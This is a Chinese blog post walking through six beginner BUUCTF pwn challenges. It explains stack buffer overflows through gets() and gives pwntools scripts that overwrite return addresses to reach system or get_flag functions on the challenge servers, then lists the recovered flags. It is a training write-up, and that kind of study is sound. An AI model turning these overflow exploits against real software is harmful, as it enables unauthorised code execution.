BUUCTF前六题

最新推荐文章于 2024-04-23 14:52:52 发布
最新推荐文章于 2024-04-23 14:52:52 发布
阅读量2.1k 收藏
点赞数
分类专栏: ctf pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Greic/article/details/122125557
版权

test_your_nc

emmmmm,第一题没啥好说的,nc后直接便有了程序的控制权,cat flag即可得到flag:
在这里插入图片描述
所以flag为:flag{92968833-30fe-47d1-8d28-d398ce58d681}

rip

老样子,检查保护机制:
在这里插入图片描述linux下64位程序只开了NX(栈不可执行),先拖进ida看看:
在这里插入图片描述
很容易看出来,溢出点为gets函数,此外,易得fun函数处有系统级函数:
在这里插入图片描述
则即可通过gets函数的溢出,在主函数结束后执行fun函数,然后获得程序的控制权,随之得到flag,exp和flag如下:

#!/usr/bin/python3
from pwn import *
sh=remote('node4.buuoj.cn','26578')
payload=b'a'*(0xf+0x8)+p64(0x40118A)
sh.sendline(payload)
sh.interactive()

运行:
在这里插入图片描述
由此可得flag为:flag{76f97e3a-6b56-4fe9-b0a5-f230001c5914}

warmup_csaw_2016

万变不离其宗,看文件类型和保护类型:
在这里插入图片描述和上题一模一样,还是拖进IDA看看:
在这里插入图片描述

在这里插入图片描述这题和以前的题不同的是,并不需要获得程序的控制权限,只需要运行system函数即可,同样很容易看出来本题的溢出函数仍然是gets函数,易得exp和flag:

#!/usr/bin/python3
from pwn import *
sh=remote('node4.buuoj.cn','27771')
sh.recv()
payload=b'a'*(0x48)+p64(0x400611)
sh.sendline(payload)
sh.interactive()

运行:
在这里插入图片描述
所以flag为:flag{ 40db9955-509d-40ed-b528-7d6bb5cc7b80}

ciscn_2019_n_1

老样子:
在这里插入图片描述
ida查看:
在这里插入图片描述
这道题!!!!!有点🐕,很多人会想着利用gets函数将v2的值修改为11.28125,然后进入函数!!!!然后,问题就出来了!!!这个数是个小数,如果直接用p32打包去传,不行!因为p32传的只能是整数,后来我发现,我为什么要使他们相等?我直接利用gets函数,然后执行system函数即可,由此可得,exp和flag:

#!/usr/bin/python3
from pwn import *
sh=remote('node4.buuoj.cn','25262')
payload=b'a'*(0x38)+p64(0x4006BE)
sh.sendline(payload)
sh.interactive()

运行:在这里插入图片描述
所以flag为:flag{e0754b95-bc73-4b8f-80df- 739f4e281cod}

pwn1_sctf_2016

老样子:在这里插入图片描述
ps:不看文件名我都觉得一张图复制了五遍了,2333333,然后看ida:
在这里插入图片描述
在这里插入图片描述
其实刚刚看到这些东西,我是一脸懵逼的,因为我没学过C++,然后看了看别人的write,然后觉得自己观察的还是太不仔细,这题很明显和I和you有关,本题为s分配了0x3c的空间,而实际只用了0x20,完全没有达到溢出的条件,然后看后面,也只是将s经过一系列操作然后再复制给s,然后中间转化,很容易发现,如果我们输入的是I则会转换成you,也就是输入1个字节会变成3个字节,由此可得溢出,我们需要填满0x3c+0x4(因为是32程序,所以ebp是四个字节),则我们可以输入21个I,然后再输入一个除I以外的字符,然后将ret修改成get_flag函数即可,则可得exp和flag:

#!/usr/bin/python3
from pwn import *
sh=remote('node4.buuoj.cn','26765')
payload=b'I'*(0x15)+b's'+p32(0x8048F13)
sh.sendline(payload)
sh.interactive()

运行:
在这里插入图片描述
所以flag为:flag{ob045902-1e11-4985-b7ea-88709054c21f}

jarvisoj_level0

本题由于我在攻防世界做过原题,因此在这就不做过多的解释,感兴趣的朋友可以看我之前的博客:攻防世界PWN题——level0_Greic的博客-CSDN博客

总结

这几道题型其实都差不多,只是让我们了解栈溢出的。道阻且长!!!!继续努力!!!!争取早日向师傅们看齐!!!!一起加油吧,各位~

Greic
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0ctf_2016_warmup
05-17
2016年0ctf的pwn题。
pwn-nc题目解析
2201_75327657的博客
03-09 683
利用本身虚拟机自带的nc可直接解出flag
BUUCTF-warmup_csaw_2016 (新手pwner的成长日记3)
weixin_58410275的博客
04-23 943
解释一下这里填充数据为什么是4*16,我们在ida里面双击v5这个字符进入栈区一看,它是在s的基础上,从0到40的var_40占用的是4*16个字节的空间,+8是因为64位文件的rbp需要填充。的函数,进去一看,不得了不得了,我们的payload直接利用sub_40060D函数就行了,甚至不需要获取shell权限,地址在反编译之可以在函数末尾看见的,就不做展示了。由于文件的漏洞函数直接打开了flag文件,所以我们直接得到了flag的交互。然后我们再翻一翻,找一找,有个。gets的内容,这里思路就到达。
warmup_csaw_2016
weixin_56301399的博客
07-20 1325
做了几道入门的题,从原来的柔弱蚂蚁到现在稍稍强壮的蚂蚁,我决定实施菜狗子计划,让蚂蚁继续进化。题目中的思路很清晰,对于栈溢出,我们先判断是否有栈溢出的漏洞,之后去找系统调用的函数,然后查到他的地址,最后就是我们的代码构建了。偏移量的计算=(数组本身大小+对应位的偏移64位是ox8)然后加上我们系统调用函数的地址。...
BUUCTF-Pwn-test_your_nc
餐桌上的猫
10-31 714
题目截图 从题目描述可以看出,要使用要nc(netcat)命令 先了解一下netcat命令是什么 官网:http://netcat.sourceforge.net/ netcat是一款调试 TCP/UDP 网络连接的利器,常被称作网络调试的瑞士军刀 nc 有以下功能: 模拟 TCP 服务端 模拟 TCP 客户端 模拟 UDP 服务端 模拟 UDP 客户端 模拟 UNIX socket 服务端 模拟 UNIX socket 客户端 端口扫描 传输文件 将服务器 bash 暴露给远程客户端 内网穿透,反向获取
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 374
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
BUUCTF逆向八题
01-24
内容为BUUCTF里reserve的八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
BUUCTF部分web题目
最新发布
05-06
写题记录
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分,
buuctf warmup_csaw_2016
yidalipao1的博客
09-03 439
buuctf pwn
PWN入门刷题——BUUCTF(1-4)
ChenD的学习笔记
09-23 561
最近为了学校组织的ctf比赛才开始接触pwn的刚刚做了十多道题现在来记录一下,记录完了接着学后面贼难的内容!
PWN学习记录(3)BUUCTF-warmup_csaw_2016
m0_58824086的博客
08-01 323
由**char v5[64]**可得,在main函数的栈帧中,划分了一个64字节的存储空间,也就是说只需要存入64个字节地址,就可以get函数返回地址。下载题目得到 warmup_csaw_2016,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将warmup_csaw_2016文件放入IDA中查看,打开字符串窗口。可得该文件是64位且该题任何保护都没有打开,所以我们可以实现最简单的栈溢出。将exp文件输入进1.py中,Esc+:wq保存并退出1.py。
warmup_csaw_2016解题思路及步骤
2301_81504456的博客
02-29 329
合理选取返回地址,在字符串窗口中寻找有用数据信息。
[BUUCTF] 备赛刷题第三天
Dannie01的博客
11-05 244
刷题目录[网鼎杯 2020 玄武组]SSRFMe [网鼎杯 2020 玄武组]SSRFMe 想好好做一下ssrf打redis <?php function check_inner_ip($url) { $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url); if (!$match_result) { die('url fomat error'); }
CTF buuoj pwn-----第3题:warmup_csaw_2016
bing_Max的博客
08-29 1637
CTF buuoj pwn-----第3题:warmup_csaw_2016言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
【Pwn | CTF】BUUCTF warmup_csaw_2016
weixin_46301214的博客
02-04 413
天命:第二题pwn,这次知道了目标就是瞄准system函数,如果里面是 /bin/sh 之类的就是直接getshell,如果是普通命令的话,应该就是getflag了。点进去变量,然后这里开始我就不懂了,别人wp就说这里是40空间+8空间(8空间就是覆盖64位下rbp的长度)sub_40060D这个函数就是重点,点进去一看就是我们的目标system("cat flag.txt")那就要拿到两个东西:sub_40060D函数的入口地址 和 v5变量的缓冲区大小。条件一:获取sub_40060D函数入口地址。
[BUUCTF]pwn栏目 warmup_csaw_2016 1的题解和小疑问,欢迎讨论
XDiku的博客
11-01 1282
[BUUCTF]pwn栏目 warmup_csaw_2016 1的题解和小疑问,欢迎讨论
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF(Server Side Request Forgery)漏洞,可以通过对内网web应用实施攻击获取webshell。因此,在buuctf web题目中,可能需要掌握SSRF漏洞的利用和对web应用的渲染函数(render函数)进行利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【CTF】buuctf web 详解(持续更新)](https://blog.csdn.net/m0_52923241/article/details/119641325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【BUUCTF刷题】Web解题方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [BUUCTF的Web真题学习整理(一)](https://blog.csdn.net/qq_41429081/article/details/98042205)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值